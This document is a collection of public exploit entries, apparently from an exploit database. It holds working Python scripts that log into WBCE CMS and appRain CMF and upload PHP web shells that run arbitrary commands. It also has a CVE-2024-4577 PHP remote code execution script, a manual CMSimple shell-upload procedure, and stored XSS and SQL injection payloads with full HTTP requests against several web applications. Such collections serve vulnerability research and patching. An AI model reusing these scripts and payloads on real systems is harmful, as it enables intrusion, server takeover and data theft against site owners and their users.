# Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution (RCE) # Date: 3/5/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://wbce-cms.org/ # Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip # Version: 1.6.2 # Tested on: MacOS import requests from bs4 import BeautifulSoup import sys import time def login(url, username, password): print("Logging in...") time.sleep(3) with requests.Session() as session: response = session.get(url + "/admin/login/index.php") soup = BeautifulSoup(response.text, 'html.parser') form = soup.find('form', attrs={'name': 'login'}) form_data = {input_tag['name']: input_tag.get('value', '') for input_tag in form.find_all('input') if input_tag.get('type') != 'submit'} # Kullanıcı adı ve şifre alanlarını dinamik olarak güncelle form_data[soup.find('input', {'name': 'username_fieldname'})['value']] = username form_data[soup.find('input', {'name': 'password_fieldname'})['value']] = password post_response = session.post(url + "/admin/login/index.php", data=form_data) if "Administration" in post_response.text: print("Login successful!") time.sleep(3) return session else: print("Login failed.") print("Headers received:", post_response.headers) print("Response content:", post_response.text[:500]) # İlk 500 karakter return None def upload_file(session, url): # Dosya içeriğini ve adını belirleyin print("Shell preparing...") time.sleep(3) files = {'upload[]': ('shell.inc',"""<html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html>""", 'application/octet-stream')} data = { 'reqid': '18f3a5c13d42c5', 'cmd': 'upload', 'target': 'l1_Lw', 'mtime[]': '1714669495' } response = session.post(url + "/modules/elfinder/ef/php/connector.wbce.php", files=files, data=data) if response.status_code == 200: 
print("Your Shell is Ready: " + url + "/media/shell.inc") else: print("Failed to upload file.") print(response.text) if __name__ == "__main__": url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] session = login(url, username, password) if session: upload_file(session, url)
-
CMSimple 5.15 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: CMSimple 5.15 - Remote Command Execution # Date: 04/28/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.cmsimple.org # Software Link: https://www.cmsimple.org/downloads_cmsimple50/CMSimple_5-15.zip # Version: latest # Tested on: MacOS # Log in to SimpleCMS. # Go to Settings > CMS # Append ",php" to the end of the Extensions_userfiles field and save it. # Navigate to Files > Media # Select and upload shell.php # Your shell is ready: https://{url}/userfiles/media/shell.php
-
appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated) # Date: 04/28/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.apprain.org # Software Link: https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip # Version: latest # Tested on: MacOS import requests import sys import time import random import string def generate_filename(): """ Generate a 5-character random string for filename. """ return ''.join(random.choices(string.ascii_lowercase, k=5)) + ".inc" def login(site, username, password): print("Logging in...") time.sleep(2) login_url = f"https://{site}/admin/system" session = requests.Session() login_data = { 'data[Admin][admin_id]': username, 'data[Admin][admin_password]': password } headers = { 'Content-Type': 'application/x-www-form-urlencoded' } response = session.post(login_url, data=login_data, headers=headers) if "Logout" in response.text: print("Login Successful!") return session else: print("Login Failed!") sys.exit() def upload_shell(session, site): print("Shell preparing...") time.sleep(2) filename = generate_filename() upload_url = f"https://{site}/admin/filemanager/upload" files = { 'data[filemanager][image]': (filename, "<html><body><form method='GET' name='<?php echo basename($_SERVER['PHP_SELF']); ?>'><input type='TEXT' name='cmd' autofocus id='cmd' size='80'><input type='SUBMIT' value='Execute'></form><pre><?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?></pre></body></html>", 'image/jpeg') } data = { 'submit': 'Upload' } response = session.post(upload_url, files=files, data=data) if response.status_code == 200 and "uploaded successfully" in response.text: print(f"Your Shell is Ready: https://{site}/uploads/filemanager/(unknown)") else: print("Exploit Failed!") sys.exit() if __name__ == "__main__": print("Exploiting...") time.sleep(2) if len(sys.argv) != 4: print("Usage: python exploit.py sitename.com username password") sys.exit() site = sys.argv[1] username = sys.argv[2] 
password = sys.argv[3] session = login(site, username, password) upload_shell(session, site)
-
AEGON LIFE v1.0 Life Insurance Management System - Stored cross-site scripting (XSS)
# Exploit Title: Life Insurance Management System - Stored cross-site scripting (XSS) # Exploit Author: Aslam Anwar Mahimkar # Date: 18-05-2024 # Category: Web application # Vendor Homepage: https://projectworlds.in/ # Software Link: https://projectworlds.in/life-insurance-management-system-in-php/ # Version: AEGON LIFE v1.0 # Tested on: Linux # CVE: CVE-2024-36599 # Description: ---------------- A stored cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter at insertClient.php. # Payload: ---------------- <script>alert(document.domain)</script> # Attack Vectors: ------------------------- To exploit this vulnerability, submit <script>alert(document.domain)</script> as the name value; when a user later visits Client.php, the stored XSS executes. # Burp Suite Request: ---------------------------- POST /lims/insertClient.php HTTP/1.1 Host: localhost Content-Length: 30423 Cache-Control: max-age=0 sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymKfAe0x95923LzQH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/lims/addClient.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n Connection: close ------WebKitFormBoundarymKfAe0x95923LzQH Content-Disposition: form-data; name="client_id" 1716051159 ------WebKitFormBoundarymKfAe0x95923LzQH Content-Disposition: form-data; name="client_password" password 
------WebKitFormBoundarymKfAe0x95923LzQH Content-Disposition: form-data; name="name" <script>alert(document.domain)</script> ------WebKitFormBoundarymKfAe0x95923LzQH Content-Disposition: form-data; name="fileToUpload"; filename="runme.jpg_original" Content-Type: application/octet-stream ÿØÿà
-
Carbon Forum 5.9.0 - Stored XSS
# Exploit Title: Persistent XSS in Carbon Forum 5.9.0 (Stored) # Date: 06/12/2024 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.94cb.com/ # Software Link: https://github.com/lincanbin/Carbon-Forum # Version: 5.9.0 # Tested on: Windows XP # CVE: N/A ## Vulnerability Details A persistent (stored) XSS vulnerability was discovered in Carbon Forum version 5.9.0. The vulnerability allows an attacker to inject malicious JavaScript code into the Forum Name field under the admin settings. This payload is stored on the server and executed in the browser of any user who visits the forum, leading to potential session hijacking, data theft, and other malicious activities. ## Steps to Reproduce 1. Log in as Admin: Access the Carbon Forum with admin privileges. 2. Navigate to Settings: Go to '/dashboard' and select the Basic section. 3. Enter Payload: Input the following payload in the Forum Name field: <script>alert('XSS');</script> 4. Save Settings: Save the changes. 5. The XSS payload will trigger.
-
XMB 1.9.12.06 - Stored XSS
# Exploit Title: Persistent XSS in XMB 1.9.12.06 # Date: 06/12/2024 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.xmbforum2.com/ # Software Link: https://www.xmbforum2.com/download/XMB-1.9.12.06.zip # Version: 1.9.12.06 # Tested on: Windows XP # CVE: N/A ## Vulnerability Details A persistent (stored) XSS vulnerability was discovered in XMB 1.9.12.06. The vulnerability allows an attacker to inject malicious JavaScript code into a template or specific fields. This payload is stored on the server and executed in the browser of any user who visits the forum, leading to potential session hijacking, data theft, and other malicious activities. ### XSS in Template An attacker can inject malicious JavaScript code into a template: 1. Log in as Admin: Access the XMB Forum with admin privileges. 2. Navigate to the Administration Panel: Go to `/cp.php`, then in "Look & Feel" select "Templates". This opens `/cp2.php?action=templates`. Select the "footer" template and click edit. 3. Enter Payload: Add the XSS payload in the footer template: <script>alert('XSS');</script> 4. Save the Change: Click "Submit Changes". 5. Trigger the Payload: The XSS payload will trigger anywhere the footer template is rendered. ### XSS in News Ticker An attacker can inject malicious JavaScript code into the News Ticker field of the Front Page Options: 1. Log in as Admin: Access the XMB Forum with admin privileges. 2. Navigate to the Administration Panel: Go to `/cp.php`, then in "Settings" go to "Front Page Options". 3. Enter Payload: Add the XSS payload in the "News in Newsticker" field: <img src=x onerror=alert(1)> 4. Save the Change: Click "Submit Changes". 5. Trigger the Payload: The XSS payload will trigger anywhere the News Ticker is displayed, e.g., the home page.
-
AEGON LIFE v1.0 Life Insurance Management System - SQL injection vulnerability.
# Exploit Title: Life Insurance Management System - SQL injection vulnerability. # Exploit Author: Aslam Anwar Mahimkar # Date: 18-05-2024 # Category: Web application # Vendor Homepage: https://projectworlds.in/ # Software Link: https://projectworlds.in/life-insurance-management-system-in-php/ # Version: AEGON LIFE v1.0 # Tested on: Linux # CVE: CVE-2024-36597 # Description: ---------------- Aegon Life v1.0 was discovered to contain a SQL injection vulnerability via the client_id parameter at clientStatus.php. Important user data or system data may be leaked and system security may be compromised; the environment is then no longer secure, and the leaked information can be used by malicious users. # Payload: ------------------ client_id=1511986023%27%20OR%201=1%20--%20a # Steps to reproduce -------------------------- -Log in with your credentials -Navigate to /client.php -Click on Client Status -This navigates to /clientStatus.php -Capture the request in Burp and inject the SQLi payload into the client_id= field # Burp Request ------------------- GET /lims/clientStatus.php?client_id=1511986023%27%20OR%201=1%20--%20a HTTP/1.1 Host: localhost sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n Connection: close
-
PHP < 8.3.8 - Remote Code Execution (Unauthenticated) (Windows)
# Exploit Title: PHP Windows Remote Code Execution (Unauthenticated) # Exploit Author: Yesith Alvarez # Vendor Homepage: https://www.php.net/downloads.php # Version: PHP 8.3,* < 8.3.8, 8.2.*<8.2.20, 8.1.*, 8.1.29 # CVE : CVE-2024-4577 from requests import Request, Session import sys import json def title(): print(''' _______ ________ ___ ___ ___ _ _ _ _ _____ ______ ______ / ____\ \ / / ____| |__ \ / _ \__ \| || | | || | | ____|____ |____ | | | \ \ / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__ / / / / | | \ \/ / | __|______/ /| | | |/ /|__ _|______|__ _|___ \ / / / / | |____ \ / | |____ / /_| |_| / /_ | | | | ___) | / / / / \_____| \/ |______| |____|\___/____| |_| |_| |____/ /_/ /_/ Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py ''') def exploit(url, command): payloads = { '<?php echo "vulnerable"; ?>', '<?php echo shell_exec("'+command+'"); ?>' } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'Content-Type': 'application/x-www-form-urlencoded'} s = Session() for payload in payloads: url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" req = Request('POST', url, data=payload, headers=headers) prepped = req.prepare() del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15) #print(prepped.headers) #print(url) #print(resp.headers) #print(payload) print(resp.status_code) print(resp.text) if __name__ == '__main__': title() if(len(sys.argv) < 2): print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(sys.argv[0])) print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0])) exit(0) else: exploit(sys.argv[1],sys.argv[2])